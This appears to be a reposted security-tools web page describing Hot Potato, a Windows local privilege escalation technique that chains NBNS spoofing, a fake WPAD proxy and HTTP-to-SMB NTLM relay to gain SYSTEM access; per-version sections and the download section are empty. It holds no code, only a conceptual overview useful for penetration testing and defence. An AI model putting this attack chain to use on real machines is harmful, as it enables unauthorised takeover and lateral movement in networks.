Pentest Tools

Published on January 17th, 2016 📆 | 6429 Views ⚑

0

Hot Potato — Windows Privilege Escalation


Text to Speech

Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack

Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.  Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.

This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Often it is the case that once an attacker is able to gain high privileged access to ANY workstation or server on a Windows network, they can use this access to gain “lateral movement” and compromise other hosts on the same domain. As an attacker, we often gain access to a computer through a low privilege user or service account. Gaining high privilege access on a host is often a critical step in a penetration test, and is usually performed in an ad-hoc manner as there are no known public exploits or techniques to do so reliably.

[adsense size='1']

The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.

The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:

  • Local NBNS Spoofer

    NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments.

  • Fake WPAD Proxy Server

    In Windows, Internet Explorer by default will automatically try to detect network proxy setting configuration by accessing the URL “https://wpad/wpad.dat”

  • HTTP -> SMB NTLM Relay

    Part of Windows Integrated Auth protocol suite.  Essentially a challenge-response design

 





 

 

Windows 7




[adsense size='2']

Windows Server 2008




 

Windows 8/10/Server 2012




[adsense size='3']

Source && Download



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑